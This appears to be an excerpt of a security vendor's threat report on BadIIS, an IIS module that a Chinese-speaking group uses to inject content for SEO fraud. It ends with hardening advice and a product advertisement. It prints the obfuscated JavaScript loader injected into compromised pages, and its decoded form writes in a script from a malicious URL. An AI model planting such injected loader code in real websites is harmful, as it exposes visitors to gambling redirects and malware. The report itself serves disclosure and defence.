Chinese-Speaking Group Manipulates SEO with BadIIS

The following obfuscated code is used for injection:

<script type = “text/javascript”> eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? ” : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!”.replace(/^/, String)) {
        while (c–) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return ‘\\w+’
        };
        c = 1
    };
    while (c–)
        if (k[c]) p = p.replace(new RegExp(‘\\b’ + e(c) + ‘\\b’, ‘g’), k[c]);
    return p
}(‘m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\’\’.i(/^/,o)){j(c–)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\’\\\\w+\’};c=1};j(c–)h(k[c])p=p.i(q s(\’\\\\b\’+e(c)+\’\\\\b\’,\’g\’),k[c]);f p}(\’1[“2”][“3″](\\\'<0 4=”5/6″ 7=”8://9.a/b.c”></0>\\\’);\’,l,l,\’t|u|v|x|y|z|A|B|C|D|E|F|G\’.H(\’|\’),0,{}))’, 44, 44, ‘|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|{js}|split’.split(‘|’), 0, {})) </script>

The C&C URL is encrypted with single XOR key, “0x03”, and decrypted during the runtime. The decoded code is shown below:

document.write(<script type=”text/javascript” src={malicious URL}></script>)

Conclusion and the importance of IIS security

IIS is one of the services widely adopted by many organizations, and its misuse can lead to serious consequences. Attackers can exploit IIS vulnerabilities to serve malicious content to legitimate visitors of compromised websites. During recent campaigns, new variants were primarily used to deliver content related to online gambling. This approach can be easily adapted for mass malware distribution and watering hole attacks that target specific groups.

Thus, site owners face significant risks, which include damage to their reputation, potential legal consequences and loss of user trust, all due to the lack of security of their web servers. To mitigate these risks, IT managers should implement the following best practices:

• Identify assets that may be vulnerable to attackers and ensure they conduct regular checks for the latest security patches.
• Monitoring for abnormal IIS module installations is also critical, with a particular focus on installed images located in uncommon directories.
• Restrict administrative access to IIS servers and enforce strong, unique passwords with multi-factor authentication (MFA) for all privileged accounts.
• Firewalls should be used to control and monitor network traffic to and from IIS servers, limiting exposure to potential threats.
• Continuous monitoring of IIS server logs is crucial for detecting anomalies such as unusual module installations or unexpected changes in server behavior.
• Ensuring secure configurations by disabling unnecessary services and features further minimizes the attack surface and strengthens overall server security.

Trend Vision One™

Trend Vision One™ is an enterprise cybersecurity platform that simplifies security and helps enterprises detect and stop threats faster by consolidating multiple security capabilities, enabling greater command of the enterprise’s attack surface, and providing complete visibility into its cyber risk posture. The cloud-based platform leverages AI and threat intelligence from 250 million sensors and 16 threat research centers around the globe to provide comprehensive risk insights, earlier threat detection, and automated risk and threat response options in a single solution.

Read More HERE